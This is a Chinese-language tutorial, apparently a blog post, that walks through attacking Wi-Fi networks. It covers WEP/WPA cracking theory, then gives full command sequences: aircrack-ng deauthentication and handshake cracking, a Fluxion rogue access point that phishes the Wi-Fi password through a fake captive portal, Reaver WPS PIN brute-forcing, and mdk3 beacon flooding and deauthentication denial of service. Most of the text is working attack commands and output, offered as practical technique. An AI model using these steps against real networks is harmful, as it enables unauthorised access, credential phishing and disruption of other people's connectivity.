欢迎光临
我们一直在努力

无线攻防:wifi攻防从破解到钓鱼

一、无线网络基础

无线安全是信息安全体系下一门很广泛的学科,包括但兵不仅限于近场(NFC)、蓝牙(Bluetooth) 、射频(radio frequency,RF) 、无线局域网(Wifi)、手机蜂窝网络(cellular) 、卫星定位(GPS)等。

无线传输在传输、认证、加密等方面,在各种设备对无线网络技术依赖的加深下变得越来越重要;随着物联网(IoT)的持续蓬勃发展,现在手机、智能设备对各类无线模块、传感器的需求也越来越大,蓝牙、GPS、NFC、模块成为必备项。从安全角度对无线网络技术的研究是很有必要的。 RTL-SDR、USRP、HackRF、及BladeRF等外设的价格下降,软件环境社区的完善,使现在对无线网络的研究已经不再像以前只能利用2.4GHz的无线网卡进行狭义的“无线”攻防。无线电通信安全将成为信息安全体系重要的一环。

1.RTL-SDR这是一个低廉的家用消费档次的DVB-T USB接口的接收机的创新发明,一个完全的软件定义无线电。
2. USRP (Universal Software Radio Peripheral,通用软件无线电外设)旨在使普通计算机能像高带宽的软件无线电设备一样工作。从本质上讲,USRP充当了一个无线电通讯系统的数字基带和中频部分。
3. HackRF主要做wei基站!射频范围很宽!
三款SDR平台对比:HackRF, bladeRF和USRP
https://www.cnblogs.com/h2zZhou/p/5484748. html

什么是无线网络?无线网络(Wirelessnetwork)是采用无线通信技术实现的网络。无线网络既包括允许用户建立远距离无线连接的全球语音和数据网络,也包括为近距离无线连接进行优化的红外线技术及射频技术,与有线网络的用途十分类似,最大的不通在于传输媒介不同,利用无线电技术取代网线,可以和有线网络互为备份。

二、无线网络的加密方式和破解方式

1、WEP加密及破解

1)、WEP加密方式

有线等效保密(wired euivalent pricacy,WEP)协议的使用RC4(rivest cipher4)串流加密技术保障机密性,并使用CRC-32校验和保密资料的正确性,包含开放式系统认证和共建认证。

2)WEP漏洞及破解

(1)802.2头消息和简单RC4流密码算法。导致攻击者在有客户端并有大量有效通信时,可以分析出WEP的密码

(2)重复使用。导致攻击者在有客户端少量通信或者没有通信时。可以使用ARP重复的方法获取大量有效的数据。

(3)无身份验证机制,使用线性函数CRC-32进行完整性校验。导致攻击者能使用虚连接和AP建立伪连接,进而获得XOR文件。使用线性函数CRC-32进行完整性校验,导致攻击者用XOR文件伪造一个ARP的包,然后依靠这个包去捕获大量有效数据。

破解WEP加密的无线信号依赖两个元素:

1)信号强度

2)是否有在线客户端。通过抓包、注入,然后获取密码,只要有这类信号就是百分之百可以破解的。

2、WPE加密方式

WPA加密方式 WPA全程为WiFi protected access,既Wif网络安全存取,有WPA和WPA2两个标准,是基于有线等效加密中几个严重的弱点而产生的。WPA加密方式目前有四种认证方式:WPA、WPA-PSK、WPA2、WPA2-PSK。

WAP加密流程如下:

⑴ 无线AP定期发送beacon数据包,使无线终端更新自己的无线网络列表。

(2)无线终端在每个信道(1~13)广播Probe Request(非隐藏类型的Wif含ESSID,隐藏类型的wif不含ESSID)。

(3)每个信道的AP回应,ProbeResponse,包含ESSID及RSN信息。

(4)无线终端给目标AP发送AUTH包。AUTH认证类型有两种︰0为开放式,1为共享式(WPA/WPA2必须是开放式)。

(5) AP回应网卡AUTH包。

(6)无线终端向AP发送关联请求包Association Request数据包。

(7)AP向无线终端发送关联响应包Association Request数据包。

(8) EAPOL四次握手进行认证(握手包是破解的关键)。

(9) 完成认证可以上网

2)WPA破解

WPA的wifi密码破解分两种方法,抓包和跑pin码

(1) 抓包破解。wifi信号的机密的。登录无线路由器,就要向路由器发送一个请求,请求和无线路由器建立连接,这个请求就是一个包,名叫握手包,这个包里面包含了发送过去的一个密码,但是这个密码是加密的。抓包破解成功与否取决于四个方面:信号强度、是否有客户端在线、跑包的机器是否足够强大、密码本是否好用等等

(2)跑pin码破解。WPS(QSS或AOSS)功能是wifi保护设置的英文缩写。对于一般用户,WPS提供了一种相当简便的机密方法,通过该功能,不仅可将具有WPS功能的wifi设备和无线路由器进行快速连接,还会随机产生一个八位数的字符串作为个人识别号码(pin)进行机密操作,省去了客户端需要连接如无线网络时,必须手动添加网络名称(SSID)及输入冗长的无线加密密码的繁琐过程

三、实战例子(一) Aircrack-ng破解wifi

USB式移动wifi
image.png

Aircrack-ng是一个包含一个多款工具的套装,

我们需要使用里面的:

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng

一共有六部分

准备
探测
抓包
攻击
字典
破解

1、准备阶段-启动wlan0

  1. ifconfig检查无线网卡wlan0是否启动
ifconfig

一定保证他现在没有连接任何wifi。上面那个wlan0里面没有IP地址什么的,就说明现在不在连接中
image.png2)查看无线网卡状态

iwconfig(查看无线网卡状态信息)

image.png3)激活无线网卡至monitor模式,监听模式

airmon-ng start wlan0(开启激活网卡)

我们可以看到上面显示mac80211 monitor mode vif enabled for wlan0 on wlan0mon……
image.png4)再次检查网卡状态

iwconfig

我们网卡的名称为wlan0mon了
image.png拓展命令

sudo ifconfig wlan0mon down
sudo iwconfig wlan0mon mode monitor
sudo ifconfig wlan0mon up

2、探测阶段-确定需要攻击的wifi

1)利用网卡搜索周围能获取的wifi的信息

airodump-ng wlan0mon

image.png可以看到,最右侧的SSID,下面是周边wifi的名字,最左侧的BSSID,是这些wifi对应的mac地址。ENC是加密方式,可以看到都是WPA2的。有的也会有WPA和WEP,但是这两个安全性都不如WPA2。CH是工作频道。

我们要破解图中的FAST 236D,这个是我的wifi。可以看到它的mac地址是F4:6A:92:90:23:6D!

本来正常情况下这张表的下半部分会罗列出连接到这个wif内的设备的mac地址,但是会在后面显示给大家看!CH频率是6记住!

3、抓包阶段-利用airodump

1)我们已经看到了要攻击的路由器的mac地址,还有工作频道。执行以下命令:

airodump-ng --ivs --bssid F4:6A:92:90:23:6D -w test -c 6 wlan0mon

我们使用airodump-ng这个攻击进行抓包
--bssid是路由器的mac地址
-w 是写入到文件longas中
-c 6 CH频道是6
--ivs 是只抓取可用于破解的IVS数据报文

需要注意的是:这里我们虽然设置了保存的文件名test,但是生成的文件不是test.ivs,而是test-01.ivs
image.png注意我们观察,STATION部分看到了两个mac地址,这两个MAC分别为我电脑和手机连接的这个wifi网络

无客户端连接AP,airodump-ng是抓不到数据的
image.png2)拓展思路抓取CAP包

airodump-ng -c 信道 -w 抓包保存目录 --bssid BSSID地址 wlan0mon网卡
CH:信道
BSSID:F4:6A:92:90:23:XX(wifi的mac)
airodump-ng -c 6 -w testquanliang/ --bssid F4:6A:92:90:23:XX wlan0mon
(抓取全量的包)

1627974763_6108ec6be805916c573f9.png!small?1627974768307image.png

4、攻击阶段-aireplay

谨记:开新窗口运行

1)思路1(方法实用性高)

这里为了获取破解所需要的WPA2握手验证的整个完整数据包,我们将会发送一种称之为”Deauth”的数据包来讲已经连接至无线路由器的合法洼陷客户端强制断开,此时客户端就会自动重新连接无线路由器,我们也就有机会捕获到包含WPA2握手验证的完整数据包了。

此处需要新开启一个shell:

aireplay-ng -0 1 -a F4:6A:92:90:23:XX -c A4:02:B9:CC:6D:XX wlan0mon

-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为1,大家可以根据实际情况设置为10不等
-a 后跟路由器的mac地址
-c 后面跟客户端的mac地址

1627974803_6108ec938286547e2afba.png!small?1627974809203

在此处可能会出现wlan0mon is on channel 13, but the AP uses channel 6问题,这是内核问题,有个暂时的解决方案

方案:设置无线网卡监听信道

通常情况下,使用Aircrack-ng工具实施无线密码破解时,都是使用airodump-ng工具捕获数据包。用户在捕获数据包时,可以通过指定监听数据的工作信道为目标AP工作的信道来解决该问题。由于AP工作信道为6,所以这里需要设置无线网卡监听信道为6。

执行命令如下所示:

airodump-ng wlan0mon -c 6
参考网站:
https://my.oschina.net/u/1585857/blog/3420946

1627974844_6108ecbc5b34acac2f8f8.png!small?1627974847414

1627974876_6108ecdc43b211cdbcfd0.png!small?1627974878209

2)思路2-利用aireplay进行攻击:(实用性一般)

aireplay-ng -0 5 -a F4:6A:92:90:23:6D wlan0mon

-0 攻击五次
-a 路由器mac

或者:
aireplay -0 0 -a F4:6A:92:90:23:6D -c A4:02:B9:CC:6D:25 wlan0mon

1627975465_6108ef29819909708324c.png!small?1627975465355

条件:
此网络需要有用户在连接,攻击手段是断开对方的网络,让对方重新连接后,重新抓取握手包,对方重新连接会自动连接进入携带了密码key

出现WPA handshake: F4:6A:92:90:23:6D 代表抓包完成!获取到了wif包的加密秘钥! 注意︰按两次Q退出,不要强制退出!

注意:如果在执行aireplay攻击后,在airodump-ng界面右上角不出现“WPA handshake: ……”字样,需要选执行“airmon-ng stop wlan0”,再次执行aireplay-ng 攻击,即可出现。

5、收集阶段-字典攻击cap(字典收集)

1)使用kali自带的秘钥字典

cd /usr/share/wordlists/
ls -al rockyou.txt

1627975476_6108ef3411f457aa4a981.png!small?1627975475456

2)使用本地的密码本

1627975491_6108ef43cd8de36fa1a5f.png!small?1627975491092

3)收集自动生成字典crunch等等。

6、破解阶段-airarck破解

1)ivs 数据包爆破

aircrack-ng -w passwd.txt test-01.ivs

1627975532_6108ef6c51eaf6fa794af.png!small?1627975532061

此时的破解速度跟使用的机器性能和字典大小有关。为了节省时间我就把密码直接加入到字典中了。可以看到破解成功时候的界面! 中间有一句:KEY FOUND!,后面的中括号里面,就是这个路由器的wif密码。到此,wif密码的破解也就完成了。

2)破解cap包

aircrack-ng -w passwd.txt /root/Desktop/testquanliang/-01.cap

1627975510_6108ef568f408fc1fbd53.png!small

成功破解

四、实战例子(二) -Fluxion钓鱼破解wifi

1、Fluxion-钓鱼2.4GHz网络

1)安装Fluxion

./fluxion.sh -i

1627975571_6108ef93b0720a3ca14f6.png!small?1627975571293

1627975578_6108ef9ab97eb9b6cbcc4.png!small?1627975578628

完成安装全部依赖包

2)选择语言

1627975583_6108ef9feebcd9d9cf42f.png!small?1627975583622

3)开始抓包

选择17进入中文模式

1627975592_6108efa8be1ebeb8facd7.png!small?1627975592186

首先为了预防对方修改过密码,或者别的特殊情况,建议先在抓一次包∶

选择handshake snooper……

1627975605_6108efb5ba04a0a517210.png!small?1627975605040

选择2.4GHZ进行抓包

1627975611_6108efbbc46a8ee90e454.png!small?1627975611242

可以看到和airodump-ng探测一样的功能

1627975617_6108efc1bf3e8e2cdd686.png!small?1627975617024

按两下Q退出后

1627975623_6108efc7c87342b89a7f6.png!small?1627975623923

带颜色的说明有客户端连接,没有带颜色说明没有客户端连接~~~

4)开始钓鱼

选择014进行钓鱼

1627975631_6108efcff08e0a5582dd0.png!small?1627975632010

选择2 跳过(一定!)

1627975640_6108efd86347bcb2838c1.png!small?1627975639768

如果这里选择弹出

恢复攻击
重置攻击

这里一定要选择重置攻击

然后选择[2]aireplay-ng 解除认证方式(侵略性),因为抓包速度最快

1627975650_6108efe239c6e5d2a4af0.png!small?1627975649522

建议选择1,也饿可以选择2 cowpatty验证,因为上一步已经选择了air,这里选择1 进行破解是最好的

1627975661_6108efed65b3f1828f2e4.png!small?1627975660649

选择每30秒即可

1627975667_6108eff365ae8db2c21ff.png!small?1627975666953

选择2 默认推荐

1627975683_6108f00365fe8c75d3603.png!small?1627975682620

选择完成后会跳转出现出三个窗口,如果窗口没有数据运行是卡住了,在fluxion窗口下执行crtl+c 结束进程,然后窗口自动关闭,在重新运行即可

1627975693_6108f00d830c357608a34.png!small?1627975692872

三个窗口进行抓包,抓包后的界面是:

1627975699_6108f013b9e319bc5e207.png!small?1627975699135

然后选择1,选择攻击方式

1627975708_6108f01c265c32d965b73.png!small?1627975707333

已经抓到握手包后,开支配置钓鱼页面,然后选择1

1627975713_6108f0215ad2d7c61ff4b.png!small?1627975712799

选择Y

1627975719_6108f0275281dd3ec5e5e.png!small?1627975718782

选择2 跳过(让他自己配置即可)

1627975724_6108f02cb24515be2f493.png!small?1627975724097

如果这一步选择完成,继续选择重置攻击即可

选择 3 ,无线网卡

1627975731_6108f0334aa3fdf37f11d.png!small?1627975730528

选择3 ,mk3

1627975735_6108f037c63895b5a64cd.png!small?1627975735033

这里2.4GHz虚拟环境下,选择mdk3,如果是5GHz选择mdk4~

选择【1】流氓 AP-hostapd(推荐)

1627975742_6108f03ede48a46b08849.png!small?1627975742321

选择[1]hash – cowpatty

1627975753_6108f04920a63b4e29980.png!small?1627975752507

选择[1] 使用抓取到的hash文件

1627975765_6108f055307d1ff56aa11.png!small?1627975764584

选择[2] cowpatty 验证 (推荐用这个)

1627975777_6108f061d78a16279ee84.png!small?1627975777253

1627975783_6108f067edcef6695e8e7.png!small?1627975783212

选择[1] 创建SSL证书

1627975789_6108f06df05503fa106e4.png!small?1627975789227

选择1] 断开原网络 (推荐)

1627975795_6108f0737a934e148acbb.png!small?1627975794726

5)钓鱼而界面选择

选择3,也可以自定义选择

1627975802_6108f07a0212fa753505d.png!small?1627975801699

1627975808_6108f080ed1fce9460726.png!small?1627975808451

选择3后就开始6个窗口,然后就无法连接FAST_236D了,连接此wifi的全部客户端被踢下线,并弹出六个窗口

1627975827_6108f09368b7f43a7ad7c.png!small?1627975826892

1、只要输入密码,就会显示在第二框白色字体中,包含mac登录信息.
2、弊端是客户端记住wifi密码的情况下,连接钓鱼的wifi是显示修改密码,无法跳转到钓鱼的界面。
3、需要一个没有机密wifi密码的客户端。连接后会调整的服务路由器,请修改密码
4、第五个绿色框字体会显示连接wifi的手机型号:是iphone

一个没有记住wifi密码的客户端连接后,钓鱼后台显示的信息

客户端显示的信息

1627975870_6108f0bed9b8c0c1b98f0.png!small?1627975870793

输入正确的密码后,自动关闭其余的窗口,只留一个窗口,将显示log文件位置,log文件中包含输入正确的密码

1627975885_6108f0cdc785dc4594e02.png!small?1627975885027

1627975897_6108f0d96793f6ff3047e.png!small?1627975896806

/opt/Fluxion/fluxion-6.9/attacks/Captive Portal/netlog/......log
  1. 底层目录详解

握手包保存的位置

/opt/Fluxion/fluxion-6.9/attacks/Handshake Snooper/handshakes

1627975909_6108f0e5a43c4186eda53.png!small

防止钓鱼界面的目录

/opt/Fluxion/fluxion-6.9/attacks/Captive Portal/sites

1627975922_6108f0f2a6174aac61520.png!small?1627975922768

解惑到正确密码保存情况

/opt/Fluxion/fluxion-6.9/attacks/Captive Portal/pwdlog

1627975964_6108f11c1c06da94cc902.png!small?1627975963713

获取你连接此wifi,显示详细信息+正确密码

/opt/Fluxion/fluxion-6.9/attacks/Captive Portal/netlog/

1627975974_6108f126606111fe151e7.png!small?1627975973833

2、Fluxion-钓鱼5GHz网络

iwconfig wlan0 mode monitor 关闭wlan0
airmon-ng check klii 关闭进程
airmon-ng start wlan0   开启进行即可

现在用airodump-ng使用-C参数指定5G频段的频率。程序会验证一下频率是否正确,正确的话就会进入监听界面了:

airodump-ng -C 5180-5885 wlan0

需要等待几分钟~ 1) 772N攻击钓鱼2.4GHz! 2) air去攻击5GHz,air攻击会导致对方无法连接5G网络!

五、实战例子(三) – Reaver 跑Pin码破解wifi

1、简介

PIN码共为8位,按431分段,总共穷举有11000种组合。通过获取到PIN码,并记住Bssid和PIN,后期可以通过一条命令爆出无线密码。 容易碰到的问题:连接超时,卡住,路由自保护等。

reave的进度表文件保存在:
1.3版 : /etc/reaver/MAC地址.wpc
1.4版:/usr/local/etc/reaver/MAC地址.wpc

开始

2、网卡启动

iwconfig
airmon-ng start wlan0

1627975991_6108f137354bd71a0086d.png!small?1627975990702

3、开启嗅探模式

1)查看支持wps的ap

wash -i wlan0mon

1627976001_6108f141380f67f6ce58e.png!small?1627976001441

2)查看目前MB有没有可以破解的wifi

1627976008_6108f14842083e3625735.png!small?1627976008258

MB是54e.的可破解,54e不可破解

4、开启破解跑pin

reaver -i wlan0monmon -b B4:54:59:5A:DF:F0 -vv

1627976022_6108f156abc62c238fd7d.png!small?1627976026112

最终你就能得到wif的PIN码以及密码。把这两个记下来,一般来说wif主人过段时间就会更改密码但不会更改PIN码,这时我们只要加上-p命令,WiFi密码秒出。

知道Pin码以后使用如下命令饭计算出wifi连接密码:
reaver -i wlan0monmon -b MAC地址 -p Pin码

总结: 此方法受信号强度和WPS保护机置等影响,尝试过几次,均信号在-70左右,均连接超时。

六、实战例子(四) -Mdk3攻击wifia

1、伪造AP攻击

无线黑客通过创建大量虚假AP基站信号来达到干扰正常无线通信的目的。具体可以使用MDK3这款工具实战,可以通过无线网卡发射随机伪造的AP信号,并可以根据需要设定伪造的AP工作信道,一般设定为干扰目标AP的同一频道。

mdk3 wlan0monmon b -g -c 6 -h 7

参数结束
b   用于伪造AP时使用的模式;
g   伪造诚提供54M即满足802.11g标准的无线网络
-c  针对的无线工作频道,这里是6;
-h  用于提升攻击效率,只针对个别无线设备有效

1627976373_6108f2b58513a3212b1ce.png!small?1627976372709

我们看到了很多假的AP信号点

1627976378_6108f2bad9ccdc7bcc333.png!small?1627976378368

2、SSID无线干扰

对于在某一频道正常工作的无线接入点,攻击者除了可以发送相同频道外,还可以发送相同SSID的无线数据流量信号来扰乱链接该AP的无线客户端的正常运作!

mdk3 wlan0mon b -n FAST_SHEN -g -c 10

-n  是使用指定的SSID来替代随机生成的SSID

1627976389_6108f2c5afd70a75d3682.png!small?1627976389228

提升发包速度

mdk3 wlan0mon b -n FAST_SHEN -g -c 10 -s 200

3、身份认证攻击

小型wifi的DDOS攻击,导致让人全部不能连接

mdk3 wlan0monmon a -a B4:54:59:5A:DF:F0

1627976396_6108f2cce0a535da1df46.png!small?1627976396501

拓展:

提出连接此AP的全部人
mdk3 wlan0mon d -s 1000 -c 11

 

赞(1)
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!